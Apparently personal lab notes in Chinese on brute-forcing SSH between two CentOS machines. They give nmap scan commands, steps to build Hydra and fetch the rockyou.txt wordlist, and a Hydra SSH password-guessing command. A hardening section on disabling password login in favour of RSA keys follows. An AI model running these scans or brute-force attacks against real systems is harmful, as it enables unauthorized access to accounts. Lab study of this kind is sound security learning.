暴力破解

nmap → 掃描網路

Nmap 入門教學

yum install nmap
nmap -sS -P0 -sV [server_IP}

Untitled

SSH : Security vulnerabilities, CVEs

Hydra

su
centos
cd ~
wget <https://github.com/vanhauser-thc/thc-hydra/archive/master.zip>
yum install -y gcc libssh-devel openssl-devel
yum install -y unzip zip
unzip master.zip
cd thc-hydra-master/
./configure
make && make install
wget <https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt>
vim user.txt
user
centos
hydra centos7-2 ssh -l user.txt -P rockyou.txt

Centos7安装Hydra(爆破神器) - Ellisonzhang - 博客园

SSH關閉密碼登入

關閉ssh的帳號密碼登入,讓使用者採用rsa key進行登入

Untitled

centos7-1

ssh-keygen (配置全按Enter)
ssh-copy-id root@centos7-2
yes
centos
ssh root@centos7-2
cd .ssh
cat authorized_keys

centos7-2

su
centos
vim /etc/ssh/sshd_config
PasswordAuthentication no

Linux Driver

動手寫 Linux Driver

Untitled

Untitled